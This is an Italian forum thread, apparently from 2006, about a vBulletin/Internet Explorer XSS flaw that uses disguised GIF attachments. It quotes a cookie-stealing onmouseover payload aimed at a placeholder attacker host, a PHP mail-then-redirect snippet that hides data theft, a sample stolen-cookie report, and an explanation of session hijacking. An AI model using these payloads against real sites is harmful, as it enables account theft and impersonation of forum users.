http://www.google.com/search?hl=it&c...btnG=Cerca&lr=
Se ne parla molto sul web, ufficialmente il vbulletin.com smentisce la cosa e dichiara un falso.
Voi che ne dite ?
Visualizzazione Stampabile
http://www.google.com/search?hl=it&c...btnG=Cerca&lr=
Se ne parla molto sul web, ufficialmente il vbulletin.com smentisce la cosa e dichiara un falso.
Voi che ne dite ?
E' vera... L'ho provato e funziona, ti ruba il cookie.. Più che un BUG di vB sarebbe da dire che si tratti un BUG del browser
Mi daresti il link all'exploit oppure mi passeresti in Sezione Staff il codice che vorrei buttarci un occhio.
Quello che ho guardato io non fa assolutamente nulla.
con quale browser l'hai utilizzato?Citazione:
Originariamente Scritto da Danny
State attenti che non muovete il mouse sul testo della pagina, perché contiene anch'esso uno script (mose-over) che tenta di rubare dati ed inviarli all'autore.
Non può fare molto danno, ma se avete l'account al sito e fatto il login, questi dati saranno inviati.
L'exploit in questione riguarda Internet Explorer, e forse anche altri browser, e il sistema operativo Windows. Con l'ultimo aggiornamento per XP Pro o superiore, è stato riparato in modo tipicamente Microsoft: quick & dirty. Cioè vi appare una pagina bianca oppure la solita pagina 404. Non ho provato senza antivirus, ma credo che tutti siano abbastanza prudenti quando vanno su questi siti, o no? ;)
Tuttavia devo dire che è un exploit abbastanza divertente, sempre che si usa e non si abusa. Al posto del codice email, si potrebbe avvisare il credulone che si poteva inviare i dati mostrati a chiunque, e si consiglia aggiornare il software, oppure per fare uno scherzo a qualcuno, perché nulla vieta di mostrare davvero immagini ...
Io ho provato ad usarlo, ma non ha avuto successo quindi "solo" perchè uso Mac ?Citazione:
Originariamente Scritto da y2ksw
Sergio noi Macintoshiani siamo troppo avanti :D :D
Il Mac è fatto da gente che sa fare un passo in più - sempre. Ovviamente perché qualità non è un parametro discutibile :up:
Quindi per i Winzozziani sarebbe ancora valida la cosa.... http://www.bodyweb.it/forums/images/smilies/ciglia.gifCitazione:
Originariamente Scritto da y2ksw
Provato ora.
Porca trota se fuzionaaaaaaaaaaaaaa :(
Ce lo studiamo un pò ?
Ovviamente a scopo didattico e di tutela :D
Il codice che manda i cookies può essere nascosto in un immagine che viene caricata e si mostra correttamente ?
Sapevo che questo sarebbe venuto per prossimo :D
Generalmente no. Un file GIF, o una qualsiasi immagine, deve contenere i codici per mostrare l'immagine. Però ... per fare una cosa del genere, si può ricorrere a un trucchetto all'interno dello script, con un semplice redirect all'immagine, dopo aver fatto tutto ciò che si voleva fare, ad esempio:
In questo modo, l'immagine viene mostrato e il browser non si accorge di nulla, tanto meno l'utente.Codice PHP:<?php
// scrivi qui tutto che vuoi
mail(
"nessuno@example.com",
"oggetto",
$messaggio,
"From: webmaster@{$_SERVER['SERVER_NAME']}\r\n" .
"Reply-To: webmaster@{$_SERVER['SERVER_NAME']}\r\n" .
"X-Mailer: PHP/" . phpversion()
);
// termina script con la visualizzazione dell'immagine
header("Location: http://www.{$_SERVER['SERVER_NAME']}/image.gif");
die();
?>
Il limite dell'Exploit quindi sta solo nel caricare l'immagine sul server al quale deve "rubare" i cookies e quindi diventa pericoloso fare allegare le immagini.
Ora, per tranquillizzare, ci sono due o tre cose da dire:
Per allarmare:
- I cookie di vbulletin non espongono la password in chiaro, ma elaborato con il Message Digest 5, esattamente come si tova all'interno del database, e non svela il nome dell'utente. Più esattamente non svela nulla.
- Chi volesse ricostruire la password, dovrebbe sapere come viene composta, e poi tentare tutte le possibili combinazioni. Per una password lunga di 7 caratteri, e con i processori a disposizione oggi, questo calcolo durerebbe almeno una settimana, se non più, escludendo una qualsiasi operazione in parallelo (PC dedicato). Dopo aver ottenuta la password, è necessario accedere al database degli utenti (elenco membri) e provare l'accesso. Dopo 5 accessi errati, il giochino è bloccato per almeno 15 minuti. Per forum con 2000 utenti, il gioco dura 100 ore, ossia 4 giorni e 4 ore.
- Un pirata che entra, comunque non può fare molto danno, perché, ad esempio, la email non può essere cambiata senza che il titolare legittimo lo viene a sapere (solo se la conferma email è abilitata). Al massimo può fare un po' di disordine.
- Se vi arriva un'email che vi avvisa che state cambiando il vostro indirizzo, senza averlo fatto, o trovare le vostre cose in disordine, avvisate subito l'amministratore del forum per bloccare l'accesso.
- Non viene inviato alcun dato di altri siti visitati nella stessa sessione del browser. Se cliccate ad esempio su un'immagine preparata qui (ipoteticamente), verranno inviati soltanto i cookie di vbulletin.it
- Lo script potrebbe mostrare una maschera per sollecitare il cambio della password: NON FARLO!!!
- Vale anche per altri dati, come ad esempio il numero della carta di credito.
Di per sé allegare immagini non è pericoloso, perché vBulletin è abbastanza tutelato (prova allegare un *.gif). Il problema nasce però se il testo o la firma contiene immagini prelevati da altri siti, o loro collegamenti.Citazione:
Originariamente Scritto da Sergio
Più esattamente, i file *.gif e collegamenti a pagine statiche e dinamiche sono affetti da questo problema, quindi potrebbe diventare impossibile navigare senza essere continuamente spiati.
E infatti questo sta succedendo già da molto tempo in modo più o meno trasparente. Prendiamo ad esempio adwords di Google. Il meccanismo di Google offre una grossa privacy, ma alcune caratteristiche sono basate sulla manipolazione dei cookie tramite uno script java, che viene inviato a Google, mentre si va ad accedere una pagina, che prontamente ci suggerisce cosa comprare per prossimo :dt:
L'unico nostro grande vantaggio è, che questi servizi nascosti richiedono una potenza di calcolo al di fuori della portata economica di una qualunque azienda piccola-media-grande. Soltanto i Multinazionali e Governi si possono permettere tale lusso, e questi fanno uso abbondante di questa tecnologia, ve lo garantisco :o
Ottimo, tra parentesi ci buttiamo li che Linux e Mac non lo sentono minimamente il problema dell'exploit in questione http://www.vbulletin.it/images/smilies/dito.gif
Che ti dicevo....:D Purtroppo io uso WinZOZ anche se sta sera..... ho installato la Suse ed è stupenda!
Guarda un pò questi siti se ti vuoi divertire :Citazione:
Originariamente Scritto da Danny
www.kde-look.org
http://netdragon.sourceforge.net/ssuperkaramba.html
:cool:
fantastici! Senti Sergio, dopo aver installato la Suse il desktop nn va a + di 640x480 e i caratteri sono piccolissimi... Pensi sia un problema dei driver della sk?
Se il monitor lo consente lo puoi configurare si se proprio non hai una scheda video stranissima, ma dovrebbero essere tutte compatibili, non in modalità accellerata, ma modalità normale si, guarda nello Yast, non ricordo esattamente ora, ma c'è un modulo per configurare il monitor proprio come in win.Citazione:
Originariamente Scritto da Danny
Io avevo configurato i monitors dual head quando usavo solo Suse.
Ocio non sbattere gli occhi, 13 herz, davanti al monitor che vi prendono anche la retina e che con quella poi vi clonano il buco del cul*. :D Conviene sempre guardare il monitor nel lato superiore destro, tipo strabico, in questo modo vi vedono al massimo un quarto del DNA che non è nulla visto che il 99,99% siamo simili alle scimmie. :D
jancarlo
Ho la ATI X800GTO quindi nn è proprio stranissima :)
Cioè nello Yast nonostante cambi risoluzione resta sempre a 640... Domani controllo con + calma...
Poi mi pare strano che i caratteri si vedano in piccolissimo, quasi alcuni non si leggono da quanto son piccoli :) Consigli?
Adesso ci mandi per posta un pò della droga che hai usato :DCitazione:
Originariamente Scritto da jancarlo
Cheeee ? :D
Rimandiamo ad un post nuovo qua siamo del tutto OT : http://www.vbulletin.it/showthread.php?p=3306#post3306
Citazione:
Originariamente Scritto da Sergio
Quoto :D :D :D :up: :up:Citazione:
Originariamente Scritto da Sergio
Ecco cosa arriva tramite mail, per farvi capire la gravità della cosa:Citazione:
Originariamente Scritto da y2ksw
Xss: Hacking Ip: 87.11.***.134 Cookie: bblastvisit=1133099136; bblastactivity=1133107002; bbuserid=1****; bbpassword=250aca696300c0a3927492cd674ab4b6; vbulletin_collapse; bbstyleid=1 Url: http://www.sito.it/dir/exploit.php porta usata: 80 remote port: 2325 Giorno & Ora : Wednesday, June 28, 2006, 4:25 pm
non proprio...solo i file residenti sul dominio possono accedere ai cookie, per questo è necessario l'upload del file image.gif, altrimenti sarebbe bastato linkarlo da remoto... quindi allegati e forse avatar...Citazione:
Originariamente Scritto da y2ksw
per il resto, mi sto documentando di più su questo...
Esatto.
Quello che non ho capito se il cookies viene rilevato attraverso l'immagine allegata tramite il vBulletin, quelle inserite nel MySql per intenderci, non so se è da considerarsi un "click diretto" :confused:
allora...Citazione:
Originariamente Scritto da Sergio
non viene preso nulla dal server che ospita vbulletin... il bug è riferito a internet explorer, che anzichè vedere un fil .gif malformato, esegue il codice contenuto, di fatto residente sul server ospitante vbulletin, in quanto è un attach.
cosa c'è scritto li dentro? semplicemente richiama un file esterno che non fa altro che salvarsi il cookie del pc dell'utente che con il mouse passa sopra all'immagine, lo si vede da qui:
più esattamente : exploit.php?c="+document.cookieCodice:<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >
dove exploit.php è la pagina sul server di chi ci ha allegato l'immagine, c è la variabile passata a quella pagine e +document.cookie altro non è che il nostro bel cookie concatenato come stringa tramite il javascript, il risultato è far spedite il nostro cookie al server remoto.
ricostruendo il cookie posso accedere con i dati dell'utente.
Stando a vedere questo passaggio, non è un bug XSS specifico di vbulletin, ma potenzialmente qualsiasi sito che permetta l'upload di file ne è soggetto, quindi tutti i vbulletin, ma anche tutte le altre piattaforme forum, cms, fotogallery ecc...
Forse mi sono espresso male ... succede in questi giorni combattuti prima delle ferie ... :pCitazione:
Originariamente Scritto da edivad82
E' chiaro che solo il sito che ospita lo script sia in grado di leggere i dati trasmessi clandestinamente tramite un file gif. Volevo dire che non c'è pericolo che si trasmettono i dati di un'altro sito.
Facciamo un esempio: Apro il browser e faccio il login su google adwords. Poi vado su vbulletin.it, con la sessione Google ancora aperta, e clicco sul fatale gif. I dati inviati riguardano soltanto i cookie di vbulletin.it, di Google non c'è traccia.
Se Google ospitasse un gif fatale, sarebbero trasmessi solo i dati di Google.
In altre parole, il flusso è: apertura sessione -> click sul gif -> chiamata dello script remoto -> reindirizzamento nascosto -> lettura dei dati dallo script sul server diverso -> eventuale invio di un gif vero -> ritorno al sito originale (forse).
Ora, se si dovesse rintracciare un gif manipolato, si potrebbe ribattere :D . Ad esempio si potrebbe lanciare un thread separato (un po come funzionano i cron), ed inviare un cookie gigantesco, un po' meno di 3 MB, con dei dati assurdi. 3 MB perché la maggioranza dei mail server non accettano messaggi maggiori. Con una ventina di click la casella postale della spia è piena e non ci passeranno due giorni e lo script sarà disattivato :D Il bello è che le caselle piene bloccano anche l'arrivo di altre mail, quindi la spia viene severamente punita :dt:.
Mhh... :confused:
a) I cookies vengono presi, copiati e mandati dal codice contenuto nella gif ad exploit.php
o
b) Il finto gif indirizza solo il browser a exploit.php
a) Sarebbe grave ed è così che l'ho capita io.
b) Non è nenche un exploit perchè il file exploit.php non lo caricheranno mai sul server desiderato.
c) Il finto gif indirizza il browser (IE) e i dati di sessione (cookie, session id) a exploit.php
exploit.php può fare quel che vuole con questi dati, e quindi anche aggiungere informazioni al cookie, per eventuali hack già installati sulla macchina della vittima.
Il meccanismo è abbastanza pericoloso, ma non nel contesto di vbulletin.
Consiglio però a tutti di munirsi di una password superiore ai 6 caratteri di lunghezza, che rende la decodifica della password impossibile per mezzi comuni.
Brutta roba allora :(Citazione:
Originariamente Scritto da y2ksw
In teoria posso rubare anche altre infrmazioni se riesco ad allegare l'immagine ad un altro sito, in generale saranno più o meno sempre boards.Citazione:
Originariamente Scritto da y2ksw
Questo non credo serva a nulla poichè la password criptata md5 va inserita direttamente nel cookies assieme al numero utente e voilà, si è già loggati automaticamente :)Citazione:
Originariamente Scritto da y2ksw
L'ultima faccina la correggo... :(
questo è sempre consigliabile, ma in questo caso viene rubato l'intero cookie...basta quello per rubare l'identità ;) rubando il cookie, salvandolo e mettendolo al posto del proprio per quel sito, ci troviamo loggati come quell'utente, provare per credere.Citazione:
Originariamente Scritto da y2ksw
purtroppo è vero... :-(
ma questo exploit è circoscritto agli user di IE?
Sembra di si.Citazione:
Originariamente Scritto da mossss
A quest'ultima possibilità non ne avevo pensato, ma è vero ... :mad: . Effettivamente lo script exploit.php potrebbe sfruttare la sessione già aperta per fare una qualsiasi cosa per conto del legittimo proprietario dell'account, quindi anche mandare dei messaggi (spam) o roba del genere.Citazione:
Originariamente Scritto da Sergio
Quindi il problema è più serio del previsto ... Eventualmente si potrebbe ovviare il problema con un plugin all'Internet Explorer. Comunque sono abbastanza protetto dal mio antivirus, che non permette questi reindirizzamenti ...
non sembra, si ;)Citazione:
Originariamente Scritto da Sergio
Spazio pubblicitario ONCitazione:
Originariamente Scritto da y2ksw
Vuoi un buon antivirus : www.apple.com
Spazio pubblicitario OFF
Scherzi a parte, molla, io l'ho fatto un anno fa, è come uscire dal tunnel della droga :D
Non posso, il mio impero è basato su questa colonna. Per ricominciare da zero è troppo tardi per me, non posso buttare via 20 anni di esperienza con Windoze :rolleyes:Citazione:
Originariamente Scritto da Sergio
Fai assistenza a windows ? In questo caso è più che giustificato ;)Citazione:
Originariamente Scritto da y2ksw